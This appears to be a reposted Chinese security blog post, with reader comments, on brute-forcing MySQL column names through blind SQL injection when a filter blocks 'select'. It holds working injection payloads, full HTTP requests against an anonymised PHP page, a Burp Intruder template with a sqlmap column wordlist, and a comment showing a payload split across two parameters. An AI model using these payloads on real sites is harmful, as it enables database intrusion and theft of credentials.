mysql过滤过滤select情况下跑字段的方法

ps:作者通过mysql中的left()函数来判断列猜测的是否正确，然后用burp跑。

过滤select的方法：

1foreach($_REQUEST as $key => $value){
2    if($value){
3        if (substr_count(strtolower($value),'select')>0){
4            die('hacker attack!');
5            }
6        }
7    }

正面至今未遇到哪位大神能突破我的这段防注入
基本都是绕开select搞盲注
过滤select对于注入来说非常棘手
freebuf发表了一篇文章提到”碎片攻击”
最后被证明是胡扯
接着我介绍下无select的情况下猜字段
至于说有了字段有什么用,我的回答是,有了字段继续能盲注字段的值
先说明原理:

1mysql> select id,user,pwd from user where user='root' and left(pwd,0)='';
2+----+------+------+
3| id | user | pwd  |
4+----+------+------+
5| 11 | root | pass |
6| 17 | root | pass |
7| 47 | root | pass |
8| 51 | root | pass |
9+----+------+------+
104 rows in set
11  
12mysql> select id,user,pwd from user where user='root' and left(pwdx,0)='';
131054 - Unknown column 'pwdx' in 'where clause'

当字段存在时left()返回True,否则返回False
利用该特性:

1GET /qyml/company.php?user=gaoxy731024'+and+left(pass_pwd,0)=''+and+'xx'='xx HTTP/1.1
2Host: www.xxoo.com
3Proxy-Connection: keep-alive
4Cache-Control: max-age=0
5Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
6User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
7Accept-Encoding: gzip,deflate,sdch
8Accept-Language: zh-CN,zh;q=0.8
9 
10HTTP/1.1 200 OK
11Date: Thu, 02 Jan 2014 21:30:51 GMT
12Server: Apache/2.2.15 (CentOS)
13X-Powered-By: PHP/5.3.3
14Vary: Accept-Encoding
15Cache-Control: public, no-transform
16Connection: close
17Content-Type: text/html; charset=GB2312
18Content-Length: 14048

1GET /qyml/company.php?user=gaoxy731024'+and+left(user_name,0)=''+and+'xx'='xx HTTP/1.1
2Host: www.xxoo.com
3Proxy-Connection: keep-alive
4Cache-Control: max-age=0
5Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
6User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
7Accept-Encoding: gzip,deflate,sdch
8Accept-Language: zh-CN,zh;q=0.8
9 
10HTTP/1.1 200 OK
11Date: Thu, 02 Jan 2014 21:31:21 GMT
12Server: Apache/2.2.15 (CentOS)
13X-Powered-By: PHP/5.3.3
14Vary: Accept-Encoding
15Cache-Control: public, no-transform
16Connection: close
17Content-Type: text/html; charset=GB2312
18Content-Length: 23418

根据长度显而易见能判读True or False

burpsuite::intruder

1GET /qyml/company.php?user=gaoxy731024'+and+left(§pass_word§,0)=''+and+'xx'='xx HTTP/1.1
2Host: xxoo.com
3Proxy-Connection: keep-alive
4Cache-Control: max-age=0
5Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
6User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
7Accept-Encoding: gzip,deflate,sdch
8Accept-Language: zh-CN,zh;q=0.8

选择好选择好paylaod位置后
加载payload:字段名字典(sqlmap->/txt/common-columns.txt)
然后根据response长度判断是否成功
字典不给力的情况下
选择brute forcer吧~
last:有人在过滤select的情况下跑出了表名,求教技术细节.

转载请注明：jinglingshu的博客 » mysql过滤过滤select情况下跑字段的方法

这种用left()猜测字段的方法只能用于猜测当前表中的字段。用left()函数猜测字段实质上是用字符串函数来猜测，其他字符串函数也是可以的。 1.freebuf的文章不是胡扯，你再仔细看看http://blog.spiderlabs.com/2011/ ... essons-learned.html 我理解是这样的，有多个参数时，如果过滤了某些关键字，可以在每个参数构造一部分，数据库里拼接起来是完整的语句一个简单的例子 $sql="select id,tel from user where id=".$id." and tel=".$no.";"; url中构造id=1 or /*&no=123*/1=1 最后的sql就是select id,tel from user where id=1 or /* and tel=123*/1=1; 碎片大概就是这个意思 2.用left函数局限性很大，A11说的有道理。如果你过滤了select，用字符串函数来猜解的方法很常见要注意select是不能拆了再拼的，利用注释sel/*foo*/ec/*bar*/t是错的，很多资料里都是照搬这个错误

admin12年前 (2014-01-14)回复

mysql截取函数有：left(), right(), substring(), substring_index() 左截取left(str, length) 右截取right(str, length) substring(str, pos); substring(str, pos, len) substring_index(str,delim,count)

mysql过滤过滤select情况下跑字段的方法

与本文相关的文章

Hi，您需要填写昵称和邮箱！

网友最新评论 (2)